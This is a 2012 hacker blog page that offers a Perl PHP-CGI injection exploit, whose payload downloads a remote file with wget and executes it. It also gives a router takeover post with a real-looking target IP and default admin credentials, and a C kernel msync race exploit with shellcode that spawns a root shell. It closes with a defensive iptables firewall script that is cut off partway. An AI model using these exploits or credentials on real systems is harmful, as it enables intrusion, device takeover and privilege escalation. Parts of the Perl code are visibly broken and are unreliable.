CrazyCoders Coding team » Uncategorized

[Exploit Updated]: PHP CGI – executes a payload wich is php shellexec(); ,My 3rd PERL expl…

Posted on 6th May 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

Done this, but, this is only a basic version wich, i guess does things in a nice way

it is my 3rd perl exploit , so pls dont bash me, any fixes etc would be appreciated BUT remember it is using the RIGHT method, ie: injecting php by shellexec()

wich IS a PHP CGI function, and the ONLY way it Will definately exec!

ALSO this CAN execute cmds ofc, i will addin a line if you wish to do this.. ok…

Ok now on with the show….


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG,rotor/aussies,even iCER ya prick  

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage: $0 <host>\n";
print "OPTIONAL CMD USE BUT DISABLED : [Ex: id]>\n";
exit(-1);
}

##my $cmd_exec_payload = "<php? system($_GET[\'$cmd\']); ?>";  ## Optional
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";  ## Config here

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

##$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $cmd_exec_payload ." HTTP/1.1\r\n";
##print $sock "Host: $host\n";
##print $sock "Accept: */*\n";
##print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command exec payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

Enjoy / xd–

comments: 0 » tags: bots MSDN SDK sdk tutorial botmaking vs6 cpp c++, econet sendpage sploitz xploit scanning sp 2.6.18-164.xen 2.6.18 kernel 2.6-kernel 2.4-kernel grsec bot botpacks medge3 medge2 medge fatalz, exploit ac1db1tch3z ABftw hack hacked owned own3d 0wn pwnd s3l1nux selinux ldt idt wtf-is-this-poc PoC code, exploit sploit xploit macosx macos darwin localroot local root exploit race condition bzip2 KF efnet-coders code exploit-for-darwin darwinOS puredarwin gnu-darwin freebsd ftpd vsftpd proftpd exploit e, PHP-CGI-CVE-2012- php-cgi sploit exploit php-cgi exploiting cgi-bin/ cgiscanner cgi exploit perl exploit perl-coded perl/bin/fuckyou AB<3 ABDaycare<3, sshbruter bruter pam auth brute hack hacker hacking openssh ssh1 ssh2, VPS hosting dedicated servers linux bsd gentoo hosters hostvirtual vr.org haxvps vps-deals cheap-vps ipv6-vps, xchmod vladz race-condition race condition exploit buffer-overflow overflows exploiting blackhat googleme-first google spiders bots fuckoff

[Exploit]: PHP CGI exec-cmd/injection of php-code thru phptags by (xd) PERL CODE

Posted on 6th May 2012 in Codes, Exploits, Papers, Uncategorized

Done this, but, this is only a basic version wich, i guess does things in a nice way

it is my 3rd perl exploit , so pls dont bash me, any fixes etc would be appreciated BUT remember it is using the RIGHT method, ie: injecting php by shellexec()

wich IS a PHP CGI function, and the ONLY way it Will definately exec!

Ok now on with the show….


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage:\n";
print "$0 <Host> <Cmd [Ex: id]>\n";
exit(-1);
}
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

Enjoy / xd–

comments: 0 » tags: awstats 0day php cgi exploit PHP-CGI, bots MSDN SDK sdk tutorial botmaking vs6 cpp c++, bzip2 bzexe PoC race-condition, code perl cpp vb vc coding coder coders coding mad crazy php python g++ gcc cc gdb linux linux-stuff, econet sendpage sploitz xploit scanning sp 2.6.18-164.xen 2.6.18 kernel 2.6-kernel 2.4-kernel grsec bot botpacks medge3 medge2 medge fatalz, exploit ac1db1tch3z ABftw hack hacked owned own3d 0wn pwnd s3l1nux selinux ldt idt wtf-is-this-poc PoC code, linux sock_sendpage sendpage sendpage2 sendpage3 wunderbar emporium wunderbar_emporium xploit PoC julienne tinnes Tavis ormandy zx2c4x kcope kingcope remote-exploit localroot-exploit Linux NULL_ptr_de, policykit-pwnage polkit pwnage policykit pkexec exploit pkit chsh PoC_Code BASH-script sh exploit.sh /bin/sh -c suid && ./suid && su, test code c cpp burnt food, vnc exploit vncs vnclists vncsnapshot authbypass null-bypass rfb proto vncd ultravnc exploited buggy insecure vncs tightvnc winvnc ultravnc 0days 0day xploited exploitz vnccrackbot-1.1

PoC : WindWeb/2.0 Server admin add exploit , carnage for ANY .kr/.tw ! Kep pvt for 5yrs… being leaked well, we owned them now, you can try reown them :P~

Posted on 1st May 2012 in Android, Codes, Exploits, Papers, Uncategorized

ill make it short and sweet, but, i can tell you NOW, this is useable across MANY routers, and yes, it DOES matter on some routers if they enable or disable ports 80/443 ,inwich netgear, and obviously this brand , doesnt

Here we go… to add an admin or just overwrite one: Info details for exploit / jmp point and server error for gdb … have fun!


like , you will need to find your OWn index.html , as this MUSt be simply, changed, so, when you find, an exmaple would be to scan 220.76.* range.. then, learn some about routers, find a WindWeb, then it should be in
theyre admin page BUT this is accessed remotely... and, locally then after you change the pass ... i doubt many opers even change router passes once set....so you make abs no logs really... nothing shows to them unless it is some hi duty server :s
so yes, it can very VERY nice... but im not going to handout a *how to* on finding them... simple. find em yaself!
220.76.166.73:80 / was this box btw... so, as you see, 220 , is obv an adsl range and yea, what stupid ass server, runs a router ad ion port 80 ? THIS ONE! bahha

Did we contact them, umm no, did they pay us to do any work for them...so no.

///////////////////PoC By xd and dd0k/anemic
Server: WindWeb/2.0  Connection: close  Content-Type: text/html
Web Server Error Report:
Server Error: 501 Not Implemented
Operating System Error Nr:3997697:
errno = 0x3d0001

///Notes: .korean HOME routers/BIZ routers ALL affected - noted: 4mb and fast on the adsl alone.. not bad for HOME! 4meg/s!

<content="text/html; charset=euc-kr">
<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
var st_lan_subnet = new Array(4)
var st_lan_mac = new Array(4)
st_lan_ip[0] = "192.168.1.1"
st_lan_subnet[0] = "255.255.255.0"
st_lan_mac[0] = "00:05:C6:3A:1A:45"
var st_lan_active = "1"
<!--
var id = new Array();
id[0]="adsl"
id[1]="user"

var pass = new Array();
pass[0]="megapass"
pass[1]="megapass"

// will make login on the localhost/ user:adsl pass:megapass

comments: 0 » tags: bots MSDN SDK sdk tutorial botmaking vs6 cpp c++, bzip2 bzexe PoC race-condition, capture, Dan Rosenberg 50caliber 60caliber 70caliber, econet sendpage sploitz xploit scanning sp 2.6.18-164.xen 2.6.18 kernel 2.6-kernel 2.4-kernel grsec bot botpacks medge3 medge2 medge fatalz, exploit bzexe bzip2 race condition poc code, exploit sploit xploit macosx macos darwin localroot local root exploit race condition bzip2 KF efnet-coders code exploit-for-darwin darwinOS puredarwin gnu-darwin freebsd ftpd vsftpd proftpd exploit e, firewall anti-ddos ddos anti-attack attack connection limits ipv6 iptables ip6tables ruby fast ruby, linux sock_sendpage sendpage sendpage2 sendpage3 wunderbar emporium wunderbar_emporium xploit PoC julienne tinnes Tavis ormandy zx2c4x kcope kingcope remote-exploit localroot-exploit Linux NULL_ptr_de, vnc exploit vncs vnclists vncsnapshot authbypass null-bypass rfb proto vncd ultravnc exploited buggy insecure vncs tightvnc winvnc ultravnc 0days 0day xploited exploitz vnccrackbot-1.1, VPS hosting dedicated servers linux bsd gentoo hosters hostvirtual vr.org haxvps vps-deals cheap-vps ipv6-vps

[Exploiting Linux code]: Modified version … yea, abit old BUT working on FC ;) hav fun… thx to sd for this, but, added Tifflib in this… so, have a play…

Posted on 25th April 2012 in Android, Codes, Exploits, Papers, Uncategorized

This code rox as is based on the bugs within fsync/fasync..msync..now, i have changed things to suit MY tests, but.. it is verymuch nice and, well, on RHEL4-5 is still OK … enjoy!

thx to sd , AB and others for the help on this mod..


/* Fedora4 exploit in msync() - still work in progress but it will exploit... */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <linux/fcntl.h>
#include <sys/mman.h>
#include <sys/time.h>
#include <linux/elf.h>

#define __WCLONE 0x80000000 /* Wait only on non-SIGCHLD children */
#define ltime unsigned long long
#define MEMSZ (70*1024*1024)
#define MAGIC -123
unsigned char shellcode[] =

"\x60\xe8\x5f\x00\x00\x00\x30\x03\x98\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x52\x49\x56\x41\x54\x45\x2a\x6b\x65\x72\x6e\x65\x6c\x20\x63\x61\x70\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x2c\x20\x28\x63\x29\x20\x32\x30\x30\x34\x20\x3c\x73\x64\x40\x68\x79\x73\x74\x65\x72\x69\x61\x2e\x73\x6b\x3e\x2a\x50\x52\x49\x56\x41\x54\x45\x5b\xbd\x00\xe0\xff\xff\x21\xe5\x81\x7d\x00\x00\x00\x00\xc0\x72\x03\x8b\x6d\x00\x8d\x4b\x08\xb8\xb8\x00\x00\x00\xcd\x80\x8b\x11\x8b\x71\x04\x8b\x79\x08\x83\xc5\x04\x39\x55\x00\x75\xf8\x39\x7d\x04\x75\xf3\x39\x75\x08\x75\xee\x31\xc0\x48\x89\x45\x00\x89\x45\x04\x89\x45\x08\xb8\xb8\x00\x00\x00\x8d\x4b\x14\xcd\x80\xff\x41\x04\x74\x0b\x89\x55\x00\x89\x7d\x04\x89\x75\x08\xeb\xc8\x61\xb8\x85\xff\xff\xff\xc3";

static ltime gtime() {
struct timeval tv;
gettimeofday(&tv, NULL);
return tv.tv_sec * 1000000 + tv.tv_usec;
}

ltime lt;

static void time_start() {
lt = gtime();
}

static void time_end() {
printf("took %lu microseconds\n", gtime() - lt);
}

void core_stat() {
int s;
char buf[512];
char incore;
unsigned long last = 0;
FILE *f;

sprintf(buf, "/proc/%d/maps", getpid());
f = fopen(buf, "rt");
while (fgets(buf, 512, f)) {
unsigned int from, to;
unsigned int i;
if (sscanf(buf, "%x-%x", &from, &to) < 2)
break;
for (i = from; i < to; i += PAGE_SIZE) {
mincore((void *) i, PAGE_SIZE, &incore);
if (incore) {
r:;
if (!last) {
printf("in core 0x%08x-", i);
s = last = i;
continue;
}
if (last + PAGE_SIZE == i) {
last = i;
continue;
}
printf("0x%08x (%d)\n", last + PAGE_SIZE, last + PAGE_SIZE - s);
last = 0;
goto r;
}
if (!last)
continue;
printf("0x%08x (%d)\n", last + PAGE_SIZE, last + PAGE_SIZE - s);
last = 0;
}
}
fclose(f);
}
#define SWAPFILE "TTswap"
#define EATFILES "TTeatfiles"
#define EATFILE "TTeatfile"
#define SHAREFILE "TTsharefile"
#define DUMMYFILE "TTdummyfile"
#define EATTIME 10
#define LIBFILE "TTlib"

/* number of vma struct fill */
#define VMAFILL 15000
/* how much pages to sync - 2 is enough */
#define NSYNC 2
#define BASE (char *) 0x60000000
#define DBASE (char *) 0x80001000
#define EPAGE (char *) 0x80000000
#define MAPSTEP 64 * 4096
#if 1
#define DEBUG(x...) { printf("%s():", __func__); printf(x); printf("\n"); }
#else
#define DEBUG(x...)
#endif
#define sendsig(pid) kill(pid, SIGUSR1)
#define wait4sig() { while (!gotsig) pause(); gotsig = 0; }
#define PAGE_DOWN(x) (x & ~(PAGE_SIZE-1))
#define PAGE_ALIGN(x) ((x+PAGE_SIZE-1) & ~(PAGE_SIZE-1))

#undef O_DIRECT
#define O_DIRECT 0

struct libimg {
Elf32_Ehdr elf;
Elf32_Phdr ph;
};
struct dentry_struct {
unsigned dummy0, dummy1;
void *inode1, *inode2;
};
struct file_struct {
struct file_struct *next, *prev;
void *dentry;
void *mnt;
void *op;
void *f_mapping[64];
};
struct vma_struct {
void *mm;
unsigned long vm_start;
unsigned long vm_end;
struct vma_struct *vm_next;
unsigned long pgprot;
unsigned long vmflags;
char rb[16];
void *shared_next, *shared_prev;
void *vm_ops;
unsigned long pgoff;
void *file;
void *priv;
};
struct mm_struct {
struct vma_struct *mmap;
void *rb;
struct vma_struct *cache;
void *pgd1;
void *pgd2;
void *pgd3;
unsigned long locks[32];
};
struct libimg limg = {
{
e_ident: "\177ELF",
e_type: ET_EXEC,
e_machine: EM_386,
e_phoff: sizeof(Elf32_Ehdr),
e_ehsize: sizeof(Elf32_Ehdr),
e_phentsize: sizeof(Elf32_Phdr),
e_phnum: 1
},
{
p_type: PT_LOAD,
p_vaddr: 0,
p_memsz: 0
}
};

static void make_lib(char *name) {
int libfd = open(name, O_CREAT|O_RDWR|O_TRUNC, 0700);
write(libfd, &limg, sizeof(limg));
fchmod(libfd, 0700);
}
static char thread_stack[16384];
int fd1, fd2, fd3;
char buf[MAPSTEP];
int notincore;
int t4;
int t3;
int t2;
int bigsize = 0;
char *bigmem = NULL;
int swapsize = 0;
char *swapmem = NULL;
char *base = BASE;
char *vmamem;
int gotsig = 0;
int sem = 0;
#define cleanup() _cleanup(__func__, __LINE__)
void killall() {
if (t2 != getpid())
kill(t2, SIGKILL);
if (t3 != getpid())
kill(t3, SIGKILL);
if (t4 != getpid())
kill(t4, SIGKILL);
}

void _cleanup(const char *name, int line) {
printf("cleanup called! from %s:%d\n", name, line);
killall();
unlink(SHAREFILE);
unlink(SWAPFILE);
unlink(EATFILES);
unlink(EATFILE);
unlink(LIBFILE);
_exit(1);
}
#define FAKES_BASE 0x50000000

struct fakes {
int t1;
struct mm_struct mm;
struct vma_struct vma;
struct file_struct file;
struct dentry_struct dentry;
unsigned long mapping24[128];
unsigned long mapping26[128];
unsigned long inode[128];
unsigned long pgd[1024];
void *ptrs[128];
char shellcode[sizeof(shellcode)];
int t2;
};
struct fakes *fakes = (void *) FAKES_BASE;
void build_fakevma() {
int i;
memset(fakes, 0, sizeof(*fakes));
fakes->vma.vm_end = (unsigned)( base + PAGE_SIZE * 2);
fakes->vma.vm_start = (unsigned)(base + PAGE_SIZE);
fakes->vma.vmflags = 0xf;
fakes->vma.file = &fakes->file;
fakes->vma.mm = &fakes->mm;
fakes->mm.pgd1 = fakes->pgd;
fakes->mm.pgd2 = fakes->pgd;
fakes->mm.pgd3 = fakes->pgd;
memset(fakes->pgd, 0, sizeof(fakes->pgd));
for (i = 0; i < 32; i++)
fakes->mm.locks[i] = 1;
fakes->file.dentry = &fakes->dentry;
fakes->dentry.inode1 = fakes->inode;
fakes->dentry.inode2 = fakes->inode;
for (i = 0; i < 32; i++)
fakes->inode[i] = 1;
for (i = 32; i < 128; i++)
fakes->inode[i] = (unsigned long) fakes->mapping24;
for (i = 0; i < 64; i++)
fakes->file.f_mapping[i] = fakes->mapping26;
fakes->mapping26[0] = (unsigned long) fakes->inode;
for (i = 1; i <= 3; i++)
fakes->mapping26[i] = 0;
for (i = 4; i < 16; i++)
fakes->mapping26[i] = (unsigned long) &fakes->mapping26[i];
for (i = 16; i <= 30; i++)
fakes->mapping26[i] = (unsigned long) fakes->ptrs;
for (i = 0; i <= 30; i++)
fakes->mapping24[i] = (unsigned long) &fakes->mapping24[i];
for (i = 23; i <= 30; i++)
fakes->mapping24[i] = (unsigned long) fakes->ptrs;
fakes->file.op = fakes->ptrs;
for (i = 0; i < 128; i++)
fakes->ptrs[i] = fakes->shellcode;
memcpy(fakes->shellcode, shellcode, sizeof(shellcode));
}

void create_fakepage(void *buf) {
int i;
void *vma = &fakes->vma;
void **p = buf;
for (i = 0; i < MAPSTEP; i += sizeof(void *))
*p++ = vma;
}
static void sighand(int d) {
gotsig = 1;
}

static int thread(void *d) {
int t3;
int ret;
int i;
wait4sig();
printf("(sleep1)\n");
usleep(300000);
printf("(sleep1 finished)\n");
printf("trying to mmap2 back the evil page\n");
for (i = 0; i < VMAFILL; i++) {
if (i == VMAFILL/2)
ret=mmap2(swapmem + PAGE_SIZE * 2, PAGE_SIZE,PROT_READ|PROT_WRITE,MAP_SHARED|MAP_FIXED, fd3, 0);
mmap(vmamem + i * PAGE_SIZE, PAGE_SIZE,PROT_READ|((i&1)?(PROT_WRITE):(PROT_EXEC)),MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
}
swapmem[PAGE_SIZE*2] = 'x';
printf("%p, mapped\n",ret);
printf("(sleep2)\n");
if (sem)
cleanup();
sendsig(t3);
usleep(300000);
printf("(sleep2 finished)\n");
if (sem)
cleanup();
munmap(vmamem, VMAFILL * PAGE_SIZE);
printf("doing msync\n");
ret = msync(swapmem + PAGE_SIZE * 2, PAGE_SIZE * 4, MS_SYNC);
printf("finished msync, %d, errno=%d\n", ret, errno);
if (ret == -1 && errno == 123) {
sem = 0;
killall();
printf("y4'r3 1uCky k1d!\n");

setuid(0);

setresgid(0);
execl("/bin/sh", "/bin/sh", "-i", NULL);  // bit better now 
printf("execve failed %d\n", errno);
}
if (!sem) {
printf(":(\n");
cleanup();
}
_exit(0);
}
int main(int argc, char *argv[]) {
int i, n;
char *dummy = DBASE;
printf("linux kernel msync race condition\nbug discovered by sd, further research by sd and now xd\nthis is development-in-progress code\n=============================================\n");
signal(SIGUSR1, sighand);
signal(SIGALRM, sighand);
setbuf(stdout, NULL);
i = open(SHAREFILE, O_CREAT|O_RDWR|O_TRUNC, 0777);
mmap2(FAKES_BASE, PAGE_ALIGN(sizeof(*fakes)), PROT_READ|PROT_WRITE|PROT_EXEC,MAP_SHARED, i,0);
ftruncate(i, PAGE_ALIGN(sizeof(*fakes)));
build_fakevma();
t4 = fork();
if (!t4) {
while (1) {
fakes->t1++;
fakes->t2++;
sched_yield();
}
}
printf("creating page\n");
create_fakepage(buf);
i = open(DUMMYFILE,O_CREAT|O_RDWR|O_TRUNC, 0777);
ftruncate(i, MAPSTEP);
write(i, buf, MAPSTEP);
for (n = 0; n < MEMSZ; n += MAPSTEP)
mmap(dummy + n, MAPSTEP, PROT_READ|PROT_WRITE, MAP_SHARED, i, 0);
fd3 = open(EATFILE, O_CREAT|O_RDWR|O_TRUNC, 0777);
ftruncate(fd3, 16384);
fd1 = open(EATFILES, O_CREAT|O_RDWR|O_TRUNC, 0777);
alarm(EATTIME);
printf("done fakepage\n");
do {
int c;
c = write(fd1, buf, MAPSTEP);
if (c < MAPSTEP)
break;
bigsize += c;
printf("done %d Kb\r", bigsize / 1024);
} while (!gotsig);
printf("\n");
alarm(0);
gotsig = 0;
bigmem = mmap2(base - bigsize, bigsize, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_SHARED, fd1, 0);  // ye i changed this to mmap2() (xd) ...go figure
if (bigmem == MAP_FAILED)
cleanup();
t3 = fork();
if (!t3) {
wait4sig();
printf("starting aggresive write!\n");
write(fd3, bigmem, bigsize);
printf("done aggresive write!\n");
_exit(0);
}
t2 = clone(thread, thread_stack + sizeof(thread_stack) - 4, 0xf00, NULL);
swapmem = base;
if (mmap(swapmem, PAGE_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANONYMOUS|MAP_PRIVATE, 0, 0) == MAP_FAILED) cleanup();
printf("creating swapfile\n");
fd2 = open(SWAPFILE, O_CREAT|O_RDWR|O_TRUNC, 0777);
ftruncate(fd2, MEMSZ);
vmamem = swapmem + MEMSZ + 16*PAGE_SIZE;
printf("vmamem = %p\n", vmamem);
mmap(swapmem + PAGE_SIZE, PAGE_SIZE, PROT_READ|PROT_WRITE,
MAP_SHARED|MAP_FIXED, fd2, 0);
printf("swapmem = %p, swapsize = %d\n", swapmem, 2*PAGE_SIZE);
write(fd2, dummy, MEMSZ);
close(fd2);
printf("unlink\n");
unlink(SWAPFILE);
build_fakevma();
sendsig(t2);
limg.ph.p_vaddr = (unsigned) swapmem + PAGE_SIZE;
limg.ph.p_memsz = PAGE_SIZE * 2;
make_lib(LIBFILE);
printf("started uselib\n");
time_start();
uselib(LIBFILE);
time_end();
printf("uselib finished!\n");
sem = 1;
printf("pid %d\n",getpid());
n = 0;
n = waitpid(t2, NULL, __WCLONE);
printf("waitpid got %d/%d\n", n, errno);
cleanup();
}

enjoy1

xd / freelance coder

comments: 0 » tags: bots MSDN SDK sdk tutorial botmaking vs6 cpp c++, code perl cpp vb vc coding coder coders coding mad crazy php python g++ gcc cc gdb linux linux-stuff, exploit ac1db1tch3z ABftw hack hacked owned own3d 0wn pwnd s3l1nux selinux ldt idt wtf-is-this-poc PoC code, exploit ac1db1tch3z ABftw hack hacked owned own3d 0wn pwnd s3l1nux selinux ldt idt wtf-is-this-poc PoC code bash, exploit sploit xploit macosx macos darwin localroot local root exploit race condition bzip2 KF efnet-coders code exploit-for-darwin darwinOS puredarwin gnu-darwin freebsd ftpd vsftpd proftpd exploit e

IPTABLES/IP6TABLES KUSTOMISED SETTINGS TO REJECT DoS , BOTH PROTOCOLS! (LINUX)

Posted on 25th April 2012 in Codes, Exploits, Papers, Uncategorized

MY KUSTOM FIREWALL , ENJOY! SINCE MIGRATING TO BSD, I HAVE LET IPTABLES GO F**K ITSELF ABIT BUT HERE ANYHOW.. ENJOY SOME PROTECTION EH.. DONATE TO FUCKING HELP ME PAY MY LAWYER FOR CHRISTS SAKE, I WONT LAST MUCH DAMN LONGER WITHOUT IT! LOL, YES IM A BUM AND BROKE, IM SPONSRED BY MY GOVERNEMNTS SS :p SO FUCKING LIKE WHAT YOUR GETTIN, COZ I DONT REALLY HAVE TO GIVE SHIT, JUST REMMEBER THT.

HERE.


#!/bin/sh
# Loopback interface
LO_IF="lo"
# Network card connected to Internet
NET_IF="eth1"
# DMZ interface, if any
DMZ_IF=""

# iptables executables
IPTABLES="/sbin/iptables"
IP6TABLES="/sbin/ip6tables"

# Set this to 1 if you want enable IPv4 port forwarding
IPV4_FORWARDING=""
# 99% you don't need IPv6 at all, so, disable it
DISALLOW_IPV6="1"

# Ports that you want to be explicitly disabled
PORTS_TO_DISABLE="113"
# TCP traffic is completely disabled, you can cherry-pick ports
# you want to allow traffic in and out
TCP_PORTS_INCOMING_ALLOW="21 631 6667 7000 2222 80 443"
TCP_PORTS_OUTGOING_ALLOW="21 631 6667 7000 2222 80 443"
# UDP traffic is completely disabled, you can cherry-pick ports
# you want to allow traffic in and out
UDP_PORTS_INCOMING_ALLOW="53"
UDP_PORTS_OUTGOING_ALLOW="53"
# Block IPs trying to make too many connections on given ports
# If you have Entropy connecting, do not set this!
# Of course timed ports here have to be set in the variables above too.
# It will work for both tcp and udp.
TIMED_PORTS=""
# Number of times ip is allowed to bug port
TIMED_PORTS_HIT_COUNT="5"
# Number of seconds the ban will last and also the amount of time
# within user can at most try to connect TIMED_PORTS_HIT_COUNT times
TIMED_PORTS_TIMER_SECS="300"

# =========================
# PORT SETTINGS ABOVE =====
# =========================

# Allow sane ICMP packets (ping, traceroute) (DoS)
# set this to 1 if you want it, or leave unset
ALLOW_SANE_ICMP="1"
# Completely disable ICMP instead? (DoS)
# set this to 1 if you want it, or leave unset
FUCK_ICMP_I_DONT_NEED_IT=""
# Number of allowed ICMP packets per second (this is a further filter) (DoS)
ICMP_PACKETS_PER_SECOND="1"
# Also rate limit RST Packets, to mitigate SMURF attacks (DoS)
RST_PACKETS_PER_SECOND="2"

# Kill identd?
# set this to 1 if you want it, or leave unset
KILL_IDENTD="1"
# Kill port scanning? If you set this to 1, please also set
# a port to monitor against port scans (I suggest 139, trust me, it's fine for ssh too)
# IP will be blocked for PORT_SCANNING_SECONDS (1 day)
KILL_PORT_SCANNING="1"
PORT_SCANNING_PORT="139"
PORT_SCANNING_SECONDS="86400"
# Enable IP spoofing protection? (DoS)
IP_SPOOFING_PROTECTION="1"
# Enable kernel SYN flood protection? (DoS)
SYN_FLOOD_PROTECTION="1"
# Max SYN backlog on TCP
TCP_MAX_SYN_BACKLOG="1024"
# Set the tcp-time-wait buckets pool size
TCP_MAX_TW_BUCKETS="1440000"
# Ignore ICMP broadcasts anyway? (DoS)
IGNORE_ICMP_BROADCASTS="1"
# Log packets with impossible addresses?
LOG_MARTIAN_IPS="1"
# Disallow ICMP redirects? (DoS)
DISALLOW_ICMP_REDIRECTS="1"
# Disallow source routed packets? (DoS)
DISALLOW_SOURCE_ROUTED_PACKETS="1"
# Disallow multicast routing? (DoS)
#DISALLOW_MULTICAST_ROUTING="1"
# Disallow proxy_arp?
DISALLOW_PROXY_ARP="1"
# Disallow bootp relay?
DISALLOW_BOOTP_RELAY="1"
# Enable secure redirects (only accept ICMP redirects for
# gateways. Helps against MITM attacks.
ENABLE_SECURE_ICMP_REDIRECTS="1"

# Decrease the time default value for tcp_fin_timeout connection
TCP_FIN_TIMEOUT="15"
# Decrease the time default value for tcp_keepalive_time connection
TCP_KEEPALIVE_TIME="1800"
# Handle TCP window scaling, disable by default
DISALLOW_TCP_WINDOW_SCALING=""
# Turn off TCP timestamp feature
TCP_TIMESTAMP="0"

# Drop traffic from IANA-reserved IPs.
DROP_IANA_IPS="1"
# Completely ignore Microsuck ports
IGNORE_MICROSOFT_SHIT="1"

# General default logging rate limit parameters
RLIMIT="-m limit --limit 3/s --limit-burst 8"
# General default logging parameters
LOG="LOG --log-level debug --log-tcp-sequence --log-tcp-options"
LOG="${LOG} --log-ip-options"

# set this to a valid path containing your custom iptables rules
# it will be sourced
CUSTOM_RULES_FILE_PRE=""
CUSTOM_RULES_FILE_POST=""

####
#### stay away from here.
####

if [ -z "${NET_IF}" ]; then
echo "set NET_IF"
exit 1
fi
if [ ! -x ""${IPTABLES}"" ]; then
echo "set IPTABLES"
exit 1
fi
if [ ! -x ""${IP6TABLES}"" ]; then
echo "set IP6TABLES"
exit 1
fi

# drop everything by default
"${IPTABLES}" -P INPUT DROP
"${IPTABLES}" -P FORWARD DROP
"${IPTABLES}" -P OUTPUT DROP

# Set the nat/mangle/raw tables' chains to ACCEPT
"${IPTABLES}" -t nat -P PREROUTING ACCEPT
"${IPTABLES}" -t nat -P OUTPUT ACCEPT
"${IPTABLES}" -t nat -P POSTROUTING ACCEPT

"${IPTABLES}" -t mangle -P PREROUTING ACCEPT
"${IPTABLES}" -t mangle -P INPUT ACCEPT
"${IPTABLES}" -t mangle -P FORWARD ACCEPT
"${IPTABLES}" -t mangle -P OUTPUT ACCEPT
"${IPTABLES}" -t mangle -P POSTROUTING ACCEPT

# clear previous rules
"${IPTABLES}" -F
"${IPTABLES}" -t nat -F
"${IPTABLES}" -t mangle -F
"${IPTABLES}" -X
"${IPTABLES}" -t nat -X
"${IPTABLES}" -t mangle -X
"${IPTABLES}" -Z
"${IPTABLES}" -t nat -Z
"${IPTABLES}" -t mangle -Z

if [ -n "${DISALLOW_IPV6}" ]; then
"${IP6TABLES}" -P INPUT DROP
"${IP6TABLES}" -P FORWARD DROP
"${IP6TABLES}" -P OUTPUT DROP
# The mangle table can pass everything
